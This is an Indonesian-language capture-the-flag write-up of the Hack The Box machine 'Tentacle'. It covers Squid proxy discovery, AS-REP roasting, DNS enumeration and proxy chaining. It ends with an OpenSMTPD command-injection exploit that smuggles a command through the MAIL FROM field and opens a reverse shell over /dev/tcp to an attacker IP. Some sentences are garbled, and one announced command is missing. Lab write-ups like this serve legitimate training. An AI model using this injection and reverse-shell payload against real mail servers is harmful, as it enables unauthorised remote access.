Berikut Adalah Informasi Mengenai Cara Menyelesaikan Box Meshine Tentacle Pada Hackthebox , Tujuan Catatan Informasi Seperti Ini Agar Bisa Terus Mengingat Dan Mengulang Apa Yang Telah Dipelajari Sebelum Nya.
Starting point (Foothold Section)
Port Scan :
nmap -sV -sC -sT 10.10.10.224 -oN nmap.scan
Output :
3128/tcp open http-proxy Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
Scan Nmap menunjukkan 3128 port. Yang merupakan Proxy squid. Juga membuka 10.10.10.224:3128 memberi kami dua informasi. nama pengguna j.nakazawa@realcorp.htb dan subdomain srv01.realcorp.htb.
Generate Hash Brute Keyberos :
Menjalankan pemanggangan AS-REP untuk nama pengguna tersebut memberi kami hash yang merupakan ** RABBIT HOLE **:
./GetNPUsers.py -dc-ip REALCORP.HTB REALCORP.HTB/j.nakazawa -no-pass -format hashcat | tee kerbrute-hash
Find Domain Using DNS :
Sekarang menjalankan Enum DNS kita bisa mendapatkan 3 host:
ns.realcorp.htb. 259200 IN A 10.197.243.77
proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb.
ns.realcorp.htb. 259200 IN A 10.197.243.77
wpad.realcorp.htb. 259200 IN A 10.197.243.31
ns.realcorp.htb. 259200 IN A 10.197.243.77
Tetapi tidak ada IP internal yang dapat diakses. Jadi kami menambahkan proxy di proxychain kami lalu menjalankan nmap di 127.0.0.1 dan hasilnya memiliki port yang sama kecuali sekarang port baru Kpasswd5.
Tetapi dari sana juga kami tidak dapat mengakses IP apa pun, jadi mungkin proxy tidak menyukai lalu lintas masuk. Jadi kami menambahkan entri lain di proxychain kami untuk merutekan paket melalui 10.10.10.224:3128 -> 127.0.0.1:3128. Tapi kemudian tiba-tiba IP 10.197.243.77 dapat diakses.
Sekarang, di sini juga kami memiliki port squid 3128, dengan menambahkan proxy ini lagi sekarang kami mendapat IP lain 10.197.243.31 menjadi dapat Diakses dan membuka port 80. Jalankan Perintah Berikut :
Sekarang kami menjalankan WFUZZ untuk semua subdomain atau Dirbuster. Dirbuster tidak membuat apa-apa kecuali Subdomain enumeration memberi saya subdomain wpad.
Sekarang wpad adalah petunjuk yang sangat kuat bahwa itu adalah subdomain wpad sehingga kami mendapatkan file wpad.dat yang merupakan file konfigurasi default :
Jadi, kita sudah mengetahui domain 10.197.243.0, sekarang kita perlu memeriksa 10.241.251.0. Yang mana saya berlari nampan terhadap seluruh /24 oktet dengan port teratas dan melihat bahwa 10.241.251.113 memiliki port SMTP terbuka dan menjalankan OpenSMTPD.
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP inf o
Service Info: Host: smtp.realcorp.htb
kami melihat bahwa RCPT TO default: <root> tidak berfungsi jadi kami mengubah ke RCPT TO: <j.nakazawa@realcorp.htb> sebagai gantinya dan viola, kami memiliki shell terbalik. Sekarang :
sudo proxychains nc 10.241.251.113 25
HELO hacktivity
MAIL FROM:<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>
RCPT TO:<j.nakazawa@realcorp.htb>
DATA
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
0<&95-;exec 95<>/dev/tcp/10.10.14.27/1337;sh <&95 >&95 2>&95